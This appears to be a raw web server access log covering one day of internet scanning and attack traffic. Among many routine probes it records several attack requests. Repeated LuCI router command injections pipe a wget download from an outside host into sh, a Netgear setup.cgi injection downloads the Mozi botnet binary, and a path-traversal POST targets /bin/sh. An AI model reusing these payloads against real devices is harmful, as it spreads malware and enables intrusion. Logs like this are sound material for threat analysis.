91.191.209.206 - - [25/Sep/2024:00:01:52 +0200] "-" 400 1930 95.214.27.169 - - [25/Sep/2024:00:14:20 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:00:14:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [25/Sep/2024:00:14:20 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:00:14:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.249.225.89 - - [25/Sep/2024:00:16:31 +0200] "CONNECT codeforces.com:443 HTTP/1.1" 400 804 45.148.10.242 - - [25/Sep/2024:01:09:49 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 87.120.166.244 - - [25/Sep/2024:01:47:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 118.193.47.223 - - [25/Sep/2024:02:02:22 +0200] "-" 400 1930 118.193.47.223 - - [25/Sep/2024:02:02:33 +0200] "GET / HTTP/1.1" 200 1895 118.193.47.223 - - [25/Sep/2024:02:02:52 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.193.47.223 - - [25/Sep/2024:02:02:52 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.193.47.223 - - [25/Sep/2024:02:02:53 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 118.193.47.223 - - [25/Sep/2024:02:02:53 +0200] "GET /config.json HTTP/1.1" 404 729 190.108.227.250 - - [25/Sep/2024:02:05:08 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.25 - - [25/Sep/2024:02:10:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.66.76.121 - - [25/Sep/2024:02:17:39 +0200] "-" 400 1930 95.214.55.43 - - [25/Sep/2024:02:50:17 +0200] "GET /webpages/login.html HTTP/1.1" 404 741 167.94.138.39 - - [25/Sep/2024:02:55:48 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.39 - - [25/Sep/2024:02:55:52 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.39 - - [25/Sep/2024:02:55:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.224.128.83 - - [25/Sep/2024:03:26:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:03:26:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 91.191.209.206 - - [25/Sep/2024:04:22:01 +0200] "-" 400 1930 91.92.255.132 - - [25/Sep/2024:04:24:21 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 181.143.86.98 - - [25/Sep/2024:04:44:26 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.25 - - [25/Sep/2024:05:02:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 178.128.34.16 - - [25/Sep/2024:05:17:40 +0200] "-" 400 1930 185.224.128.59 - - [25/Sep/2024:05:18:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [25/Sep/2024:05:18:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 154.213.184.18 - - [25/Sep/2024:05:49:25 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.184.25 - - [25/Sep/2024:05:55:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 14.116.254.172 - - [25/Sep/2024:06:02:20 +0200] "GET / HTTP/1.1" 200 1895 87.120.166.244 - - [25/Sep/2024:06:37:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.197.56 - - [25/Sep/2024:06:39:38 +0200] "-" 400 1930 205.210.31.93 - - [25/Sep/2024:06:50:37 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.83 - - [25/Sep/2024:06:52:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:06:52:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 95.214.27.169 - - [25/Sep/2024:06:59:51 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:06:59:51 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [25/Sep/2024:06:59:51 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:06:59:51 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 81.172.196.174 - - [25/Sep/2024:07:21:54 +0200] "GET / HTTP/1.1" 200 1895 81.172.196.174 - - [25/Sep/2024:07:25:48 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.56 - - [25/Sep/2024:07:40:42 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.60 - - [25/Sep/2024:07:41:14 +0200] "GET /favicon.ico HTTP/1.1" 404 729 74.82.47.52 - - [25/Sep/2024:07:41:45 +0200] "GET /?format=json HTTP/1.1" 200 1895 74.82.47.12 - - [25/Sep/2024:07:42:10 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 74.82.47.32 - - [25/Sep/2024:07:42:39 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 179.43.133.162 - - [25/Sep/2024:08:09:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.142.236.35 - - [25/Sep/2024:08:20:33 +0200] "GET / HTTP/1.1" 200 1895 185.142.236.35 - - [25/Sep/2024:08:20:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729 95.214.55.43 - - [25/Sep/2024:08:21:05 +0200] "GET /webpages/login.html HTTP/1.1" 404 741 147.185.132.52 - - [25/Sep/2024:08:37:18 +0200] "-" 400 1930 147.185.132.52 - - [25/Sep/2024:08:37:18 +0200] "-" 400 1930 45.84.89.2 - - [25/Sep/2024:08:48:33 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.49 - - [25/Sep/2024:09:04:14 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.49 - - [25/Sep/2024:09:04:17 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.49 - - [25/Sep/2024:09:04:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.67.70 - - [25/Sep/2024:09:40:00 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 154.213.184.25 - - [25/Sep/2024:09:49:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.18 - - [25/Sep/2024:09:52:36 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.148.10.242 - - [25/Sep/2024:10:00:04 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 95.214.27.169 - - [25/Sep/2024:10:12:40 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:10:12:40 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [25/Sep/2024:10:12:40 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:10:12:40 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [25/Sep/2024:10:29:56 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 154.213.187.241 - - [25/Sep/2024:10:49:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.59 - - [25/Sep/2024:10:49:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [25/Sep/2024:10:49:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:10:52:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:10:52:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 141.98.11.122 - - [25/Sep/2024:11:05:42 +0200] "GET / HTTP/1.1" 200 1895 194.26.29.244 - - [25/Sep/2024:11:16:26 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.213 - - [25/Sep/2024:11:37:12 +0200] "GET / HTTP/1.0" 200 1895 87.120.166.244 - - [25/Sep/2024:11:39:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 192.3.160.201 - - [25/Sep/2024:12:03:39 +0200] "CONNECT bing.com:443 HTTP/1.1" 400 804 154.213.184.25 - - [25/Sep/2024:12:19:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.43 - - [25/Sep/2024:12:49:50 +0200] "GET /webpages/login.html HTTP/1.1" 404 741 185.249.225.89 - - [25/Sep/2024:13:14:13 +0200] "CONNECT codeforces.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [25/Sep/2024:13:35:14 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:13:35:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.27.169 - - [25/Sep/2024:13:35:14 +0200] "GET / HTTP/1.1" 200 1895 95.214.27.169 - - [25/Sep/2024:13:35:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 154.213.184.18 - - [25/Sep/2024:13:45:47 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 79.137.198.113 - - [25/Sep/2024:13:46:27 +0200] "-" 400 1930 79.137.198.113 - - [25/Sep/2024:13:46:27 +0200] "-" 400 1930 79.137.198.113 - - [25/Sep/2024:13:46:27 +0200] "-" 400 1930 87.120.166.244 - - [25/Sep/2024:14:31:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [25/Sep/2024:14:49:44 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 78.108.177.52 - - [25/Sep/2024:14:59:51 +0200] "GET / HTTP/1.0" 200 1895 154.213.184.25 - - [25/Sep/2024:15:15:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.83 - - [25/Sep/2024:15:26:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:15:26:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 90.151.171.108 - - [25/Sep/2024:15:50:02 +0200] "CONNECT 90.151.171.106:443 HTTP/1.1" 400 804 90.151.171.108 - - [25/Sep/2024:15:50:07 +0200] "-" 400 1930 90.151.171.108 - - [25/Sep/2024:15:50:12 +0200] "GET /ip.php?Z79065299362Q1 HTTP/1.1" 404 724 90.151.171.108 - - [25/Sep/2024:15:50:17 +0200] "-" 400 1930 185.224.128.59 - - [25/Sep/2024:16:08:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [25/Sep/2024:16:08:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 152.32.206.51 - - [25/Sep/2024:16:39:19 +0200] "-" 400 1930 152.32.206.51 - - [25/Sep/2024:16:39:29 +0200] "GET / HTTP/1.1" 200 1895 152.32.206.51 - - [25/Sep/2024:16:39:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.206.51 - - [25/Sep/2024:16:39:47 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.206.51 - - [25/Sep/2024:16:39:47 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 152.32.206.51 - - [25/Sep/2024:16:39:48 +0200] "GET /config.json HTTP/1.1" 404 729 94.156.67.70 - - [25/Sep/2024:16:40:04 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 59.52.226.190 - - [25/Sep/2024:16:56:57 +0200] "GET / HTTP/1.0" 200 1895 59.52.226.190 - - [25/Sep/2024:16:57:06 +0200] "HEAD / HTTP/1.1" 200 - 59.52.226.190 - - [25/Sep/2024:16:57:17 +0200] "-" 400 1930 59.52.226.190 - - [25/Sep/2024:16:57:17 +0200] "-" 400 1930 152.89.198.97 - - [25/Sep/2024:17:12:07 +0200] "-" 400 1930 91.92.251.254 - - [25/Sep/2024:17:39:08 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 141.98.11.122 - - [25/Sep/2024:17:44:16 +0200] "GET / HTTP/1.1" 200 1895 154.213.184.25 - - [25/Sep/2024:17:51:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.18 - - [25/Sep/2024:17:54:36 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 95.214.55.43 - - [25/Sep/2024:18:05:20 +0200] "GET /webpages/login.html HTTP/1.1" 404 741 154.213.187.102 - - [25/Sep/2024:18:16:26 +0200] "GET / HTTP/1.1" 200 1895 154.213.187.52 - - [25/Sep/2024:18:31:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 79.137.198.113 - - [25/Sep/2024:18:40:03 +0200] "POST /init HTTP/1.1" 404 722 79.137.198.113 - - [25/Sep/2024:18:40:05 +0200] "GET /new/login HTTP/1.1" 404 731 79.137.198.113 - - [25/Sep/2024:18:40:07 +0200] "GET /api/panelhash HTTP/1.1" 404 735 79.137.198.113 - - [25/Sep/2024:18:40:09 +0200] "GET /admin/console/index.html HTTP/1.1" 404 750 79.137.198.113 - - [25/Sep/2024:18:40:11 +0200] "GET /login HTTP/1.1" 404 723 79.137.198.113 - - [25/Sep/2024:18:40:13 +0200] "GET / HTTP/1.1" 200 1895 79.137.198.113 - - [25/Sep/2024:18:40:13 +0200] "GET /covenantuser/login HTTP/1.1" 404 740 185.224.128.83 - - [25/Sep/2024:19:09:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:19:09:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 87.120.166.244 - - [25/Sep/2024:19:13:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 154.213.184.15 - - [25/Sep/2024:19:19:43 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816 154.216.17.84 - - [25/Sep/2024:19:38:56 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.148.10.242 - - [25/Sep/2024:19:42:24 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 154.213.187.186 - - [25/Sep/2024:20:07:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 90.151.171.106 - - [25/Sep/2024:20:12:32 +0200] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 804 90.151.171.106 - - [25/Sep/2024:20:12:32 +0200] "-" 400 1930 90.151.171.106 - - [25/Sep/2024:20:12:37 +0200] "GET /?Z79065299362Q1 HTTP/1.1" 200 1895 90.151.171.106 - - [25/Sep/2024:20:12:37 +0200] "-" 400 1930 117.209.84.221 - - [25/Sep/2024:20:24:56 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.209.84.221:38176/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 193.248.209.211 - - [25/Sep/2024:20:38:16 +0200] "GET / HTTP/1.0" 200 1895 154.213.184.25 - - [25/Sep/2024:20:48:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 13.83.41.6 - - [25/Sep/2024:21:22:04 +0200] "GET / HTTP/1.1" 200 1895 134.209.179.239 - - [25/Sep/2024:21:22:04 +0200] "-" 400 1930 134.209.179.239 - - [25/Sep/2024:21:22:04 +0200] "-" 400 1930 134.209.179.239 - - [25/Sep/2024:21:22:04 +0200] "GET / HTTP/1.1" 200 1895 134.209.179.239 - - [25/Sep/2024:21:22:04 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 62.112.10.103 - - [25/Sep/2024:21:23:15 +0200] "GET /jenkins HTTP/1.1" 404 725 179.60.147.13 - - [25/Sep/2024:21:32:33 +0200] "-" 400 1930 94.156.71.239 - - [25/Sep/2024:21:33:59 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 154.213.184.18 - - [25/Sep/2024:21:37:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 114.242.99.122 - - [25/Sep/2024:21:51:24 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.243 - - [25/Sep/2024:21:53:38 +0200] "GET / HTTP/1.0" 200 1895 154.213.187.19 - - [25/Sep/2024:22:25:29 +0200] "CONNECT ipinfo.io:443 HTTP/1.1" 400 804 95.214.55.43 - - [25/Sep/2024:22:30:40 +0200] "GET /webpages/login.html HTTP/1.1" 404 741 45.95.169.130 - - [25/Sep/2024:22:40:16 +0200] "-" 400 1930 45.95.169.130 - - [25/Sep/2024:22:40:17 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 185.224.128.59 - - [25/Sep/2024:22:41:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.59 - - [25/Sep/2024:22:41:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 87.120.166.244 - - [25/Sep/2024:22:44:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.83 - - [25/Sep/2024:23:00:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756 185.224.128.83 - - [25/Sep/2024:23:00:10 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756 185.249.225.89 - - [25/Sep/2024:23:09:57 +0200] "CONNECT codeforces.com:443 HTTP/1.1" 400 804 167.94.145.100 - - [25/Sep/2024:23:12:09 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.100 - - [25/Sep/2024:23:12:12 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.100 - - [25/Sep/2024:23:12:13 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.156.129.48 - - [25/Sep/2024:23:22:15 +0200] "GET /login HTTP/1.1" 404 723 154.213.184.25 - - [25/Sep/2024:23:39:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.238.181.20 - - [25/Sep/2024:23:46:21 +0200] "-" 400 1930 78.108.177.54 - - [25/Sep/2024:23:46:56 +0200] "GET / HTTP/1.0" 200 1895